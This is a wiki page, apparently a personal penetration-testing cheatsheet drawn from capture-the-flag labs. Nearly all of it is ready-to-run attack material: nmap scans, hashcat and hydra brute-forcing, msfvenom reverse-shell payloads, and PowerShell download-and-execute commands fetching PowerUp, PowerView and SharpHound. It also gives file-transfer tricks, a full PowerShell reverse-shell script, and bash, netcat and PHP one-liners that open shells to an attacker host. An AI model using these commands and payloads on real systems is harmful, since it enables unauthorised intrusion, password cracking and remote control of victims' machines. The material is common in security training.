imported>Aghanim at 10:31, 20 January 2022

2022-01-20T10:31:13Z

← Older revision		Revision as of 10:31, 20 January 2022
(No difference)

imported>Aghanim at 10:31, 20 January 2022

2022-01-20T10:31:13Z

New page

== Fix STTY in reverse shell ==

<syntaxhighlight lang="bash">
# In our shell. Remember the rows anc cols
stty -a

# On victim shell
stty rows cols

</syntaxhighlight>

== Python ==

=== PDB (Python Debugger) ===

[https://docs.python.org/3/library/pdb.html https://docs.python.org/3/library/pdb.html]

<syntaxhighlight lang="python">
# Add import pdb
import pdb

# In script, before an error message, add
pdb.set_trace()

# Example
-> url = url.group(1)
(Pdb) print url.group(1)
http://swagshop.htb/index.php/admin/das[...]
(Pdb) continue

</syntaxhighlight>

== NMAP ==

Fast scan to list open ports

<syntaxhighlight lang="bash">
nmap -p- --min-rate 10000
</syntaxhighlight>

Scan using default scripts and list version, output to nmap.result

<syntaxhighlight lang="bash">
nmap -sC -sV -oN nmap.result
</syntaxhighlight>

Default nmap command to run against target

<syntaxhighlight lang="bash">
nmap -sC -sV -sU -p- --min-rate 10000 -oN outfile

</syntaxhighlight>

Enumerate LDAP

<syntaxhighlight lang="bash">
nmap -n -sV --script "ldap* and not brute" -p 389 dc-ip
</syntaxhighlight>

== Stabilize shell with python ==

<syntaxhighlight lang="bash">
python -c 'import pty;pty.spawn(“/bin/bash”)'
export TERM=xterm
Background the shell using Ctrl + Z. In our terminal we use stty raw -echo; fg.

https://blog.aghanim.net/?p=1043
</syntaxhighlight>

== Python ==

Simple HTTP server

<syntaxhighlight lang="bash">
$python -m SimpleHTTPServer
</syntaxhighlight>

== SUID ==

Find SUID bit file

<syntaxhighlight lang="bash">
find / -perm -u=s -type f 2>/dev/null
</syntaxhighlight>

== SSH Port Forward ==

<syntaxhighlight lang="bash">
# Synopsis
ssh -i id_rsa -L [bind_address]port:host:hostport] username@host

# Example
ssh -i id_rsa -L 8000:127.0.0.1:8000 donkeykong@10.10.10.100
</syntaxhighlight>

=== Chisel ===

Example: forward port 8888 to attacker using chisel

<syntaxhighlight lang="bash">
# Attacker machine
chisel server -p 8000 --reverse

# Target
chisel.exe client 10.10.14.20:8000 R:8888:localhost:8888

# Connection received on attacker machine
server: proxy#1:R:0.0.0.0:8888=>localhost:8888: Listening
</syntaxhighlight>

== Hashcat ==

Example commands

{| class="wikitable"
|-
! Attack-mode
! Hash-type
! Example command
|-
| Wordlist
| $P$
| hashcat -a 0 -m 400 example400.hash example.dict
|-
| Wordlist + Rules
| MD5
| hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule
|-
| Brute-Force
| MD5
| hashcat -a 3 -m 0 example0.hash ?a?a?a?a?a?a
|-
| Combinator
| MD5
| hashcat -a 1 -m 0 example0.hash example.dict example.dict
|-
| Association
| $1$
| hashcat -a 9 -m 500 example500.hash 1word.dict -r rules/best64.rule
|}
https://hashcat.net/wiki/doku.php?id=hashcat

== Hydra ==

{| class="wikitable"
|-
| Command
| Description
|-
| hydra -P <wordlist> -v <ip> <protocol>
| Brute force against a protocol of your choice
|-
| hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>
| You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)
|-
| hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>
| Attack a Windows Remote Desktop with a password list.
|-
| hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
| Craft a more specific request for Hydra to brute force.
|}
https://www.tryhackme.com/room/hackpark

== Msfvenom ==

<syntaxhighlight lang="bash">
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

Windows x64
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > rev_x64_shell.exe

Stageless
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > rev_shell.exe

Staged
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > rev_shell.exe
</syntaxhighlight>

<syntaxhighlight lang="bash">
Linux x64
msfvenom -p linux/x64/shell/reverse_tcp LHOST= LPORT= -f elf > shell-x64.elf

Linux x86
msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf
</syntaxhighlight>

<syntaxhighlight lang="bash">
PHPmsfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
</syntaxhighlight>

<syntaxhighlight lang="bash">
ASP or ASPX
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp or aspx > rev_shell.asp or aspx
</syntaxhighlight>

<syntaxhighlight lang="bash">
Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
</syntaxhighlight>

<syntaxhighlight lang="bash">
# Other platforms
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f elf > shell.elf
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f exe > shell.exe
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f macho > shell.macho
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f asp > shell.asp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f raw > shell.jsp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f war > shell.war
$ msfvenom -p cmd/unix/reverse_python LHOST="10.0.0.1" LPORT=4242 -f raw > shell.py
$ msfvenom -p cmd/unix/reverse_bash LHOST="10.0.0.1" LPORT=4242 -f raw > shell.sh
$ msfvenom -p cmd/unix/reverse_perl LHOST="10.0.0.1" LPORT=4242 -f raw > shell.pl
$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
</syntaxhighlight>

== Transfer files to and from target machine ==

[https://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-cheatsheet/ https://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-cheatsheet/]

=== imackets smbserver ===

Create a smbserver with share name "share", and location of folder to share

<syntaxhighlight lang="bash">
smbserver.py share /home/aghanim/Desktop/

## If target only supports smbserver2
smbserver.py share . -smb2support

## On target CMD
\\smbserver-ip\share\$FILE_NAME

## Copy file to target
copy \\smbserver-ip\share\$FILE_NAME .

## Copy file from target to attacker
copy FileToDownload \\smbserver-ip\share\FileToDownload
</syntaxhighlight>

=== Netcat ===

Must have nc.exe binary on the target machine.

<syntaxhighlight lang="bash">
# Attacking machine command
nc -lvnp 4444 > FiletoDownload

## Victim machine command
nc.exe 10.10.10.100 4444 -w 3 < Filetodownload
</syntaxhighlight>

=== Certutil ===

Easiest way to transfer to Windows

<syntaxhighlight lang="bash">
certutil -urlcache -split -f "http://ip-addr:port/file" [output-file]
</syntaxhighlight>

=== Powershell ===

Must use single quote for URL. Worsk for Windows 7 & 2008 and above.

<syntaxhighlight lang="powershell">
powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')
</syntaxhighlight>

== Compile .C to .exe ==

<syntaxhighlight lang="bash">
## Create 32-bit Windows executable with:

i686-w64-mingw32-gcc -o main32.exe main.c

## Create 64-bit Windows executable with:

x86_64-w64-mingw32-gcc -o main64.exe main.c
</syntaxhighlight>

== Pivoting technique ==

=== sshuttle ===

<syntaxhighlight lang="bash">
# Synopsis
sshuttle [options] -r [username@]sshserver[:port]

# Example
sshuttle -r linux-admin@10.200.122.33 10.200.122.0/24

</syntaxhighlight>

== Active Directory/Windows ==

=== Enumeration CMD ===

[https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters#domain-info https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters#domain-info]

Must have valid credentials on target.

<syntaxhighlight lang="bash">
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
net groups /domain #List of domain groups
net group "domain computers" /domain #List of PCs connected to the domain
net view /domain #Lis of PCs of the domain
nltest /dclist: #List domain controllers
net group "Domain Controllers" /domain #List PC accounts of domains controllers
net group "Domain Admins" /domain #List users with domain admin privileges
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the grup "Domain Admins" is included here)
net user /domain #List all users of the domain
net user /domain #Get information about that user
net accounts /domain #Password and lockout policy
nltest /domain_trust #Mapping of the trust relationships.
</syntaxhighlight>

=== Curated list of commands ===

[https://wadcoms.github.io/ https://wadcoms.github.io/]

=== psexec - Login to windows machine to get a shell ===

<syntaxhighlight lang="bash">
python3 psexec.py test.local/john:password123@10.10.10.1
</syntaxhighlight>

=== Powershell ===

Fix VHDX to Hyper-V import error - outputs error "Make sure the file is uncompressed and sparse"

<syntaxhighlight lang="powershell">
fsutil sparse setflag "C:\FilePath\FileName.iso" 0
</syntaxhighlight>

Running powershell x64, and running (IEX) the downloaded ps1 file.

<syntaxhighlight lang="powershell">
c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.17:9000/mini-reverse.ps1')
</syntaxhighlight>

Running Powershell on target with ExectionPolicy to bypass

<syntaxhighlight lang="powershell">
powershell.exe -nop -exec bypass
</syntaxhighlight>

Running PowerUp.ps1 on target machine

<syntaxhighlight lang="powershell">
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.17:9000/PowerUp.ps1');Invoke-AllChecks"
</syntaxhighlight>

Downloading SharpHound.exe on target machine

<syntaxhighlight lang="powershell">
(new-object System.Net.WebClient).DownloadFile('http://10.10.14.17:9000/SharpHound.exe', 'C:\Users\[...]\Desktop\SharpHound.exe')

# Execute SharpHound
./SharpHound.exe
</syntaxhighlight>

Running PowerView.ps1 on target machine

<syntaxhighlight lang="powershell">
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.45:5555/PowerView.ps1')
</syntaxhighlight>

Running Nishangs Invoke-PowershellTCP

<syntaxhighlight lang="powershell">
powershell -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.18:9000/shell.ps1')")
</syntaxhighlight>

Use invoke webrequest and download script. With -UseBasicParsing. ''-UseBasicParsing - Indicates that the cmdlet uses the response object for HTML content without Document Object Model (DOM) parsing. This parameter is required when Internet Explorer is not installed on the computers, such as on a Server Core installation of a Windows Server operating system.''

<syntaxhighlight lang="powershell">
iex (iwr '10.10.14.9:9000/ipw.ps1') -UseBasicParsing
</syntaxhighlight>

Download a file and save it to location.

<syntaxhighlight lang="powershell">
powershell Invoke-WebRequest -outfile c:\windows\system32\spool\drivers\color\nc.exe -uri http://10.10.14.24/nc64.exe
</syntaxhighlight>

Mini-reverseshell.ps1

<syntaxhighlight lang="powershell">
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
$res = ""
while($stream.DataAvailable -or $read -eq $null) {
$read = $stream.Read($buffer, 0, 1024)
}
$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
if(!$out.equals("exit")){
$args = "";
if($out.IndexOf(' ') -gt -1){
$args = $out.substring($out.IndexOf(' ')+1);
$out = $out.substring(0,$out.IndexOf(' '));
if($args.split(' ').length -gt 1){
$pinfo = New-Object System.Diagnostics.ProcessStartInfo
$pinfo.FileName = "cmd.exe"
$pinfo.RedirectStandardError = $true
$pinfo.RedirectStandardOutput = $true
$pinfo.UseShellExecute = $false
$pinfo.Arguments = "/c $out $args"
$p = New-Object System.Diagnostics.Process
$p.StartInfo = $pinfo
$p.Start() | Out-Null
$p.WaitForExit()
$stdout = $p.StandardOutput.ReadToEnd()
$stderr = $p.StandardError.ReadToEnd()
if ($p.ExitCode -ne 0) {
$res = $stderr
} else {
$res = $stdout
}
}
else{
$res = (&"$out" "$args") | out-string;
}
}
else{
$res = (&"$out") | out-string;
}
if($res -ne $null){
$writer.WriteLine($res)
}
}
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()
</syntaxhighlight>

=== Find .NET Version using regkey ===

<syntaxhighlight lang="bash">
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
</syntaxhighlight>

=== Potatos ===

[https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html]

=== Executing MSI on Windows ===

<syntaxhighlight lang="bash">
msiexec /quiet /i cmd.msi
</syntaxhighlight>

=== Windows Exploit Suggester ===

<syntaxhighlight lang="python">
python2 windows-exploit-suggester.py --systeminfo sys.txt -d 2022-01-14-mssb.xls
</syntaxhighlight>

== WebDav - Davtest ==

Scan the give WebDAV server

<syntaxhighlight lang="bash">
davtest -url http://10.10.10.15
</syntaxhighlight>

== Payloads & shells - Commands ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell PayloadAllTheThings]

=== BASH TCP ===

<syntaxhighlight lang="bash">
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

0/dev/tcp/10.0.0.1/4242; sh &196 2>&196

/bin/bash -l > /dev/tcp/10.0.0.1/4242 0&1

## Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash
</syntaxhighlight>

=== BASH UDP ===

<syntaxhighlight lang="bash">
Victim:
sh -i >& /dev/udp/10.0.0.1/4242 0>&1

Listener:
nc -u -lvp 4242
</syntaxhighlight>

=== Netcat Traditional ===

<syntaxhighlight lang="bash">
nc -e /bin/sh 10.0.0.1 4242
nc -e /bin/bash 10.0.0.1 4242
nc -c bash 10.0.0.1 4242
</syntaxhighlight>

=== Netcat BusyBox ===

<syntaxhighlight lang="bash">
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
</syntaxhighlight>

=== nc.exe ===

<syntaxhighlight lang="bash">
nc.exe -e cmd.exe attacker_ip attacker_port
</syntaxhighlight>

=== PHP ===

<syntaxhighlight lang="php">
php -r '$sock=fsockopen("10.10.14.17",4444);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
</syntaxhighlight>

[[Category:Cheatsheets]]

OLD CheatSheet - Revision history

imported>Aghanim at 10:31, 20 January 2022

imported>Aghanim at 10:31, 20 January 2022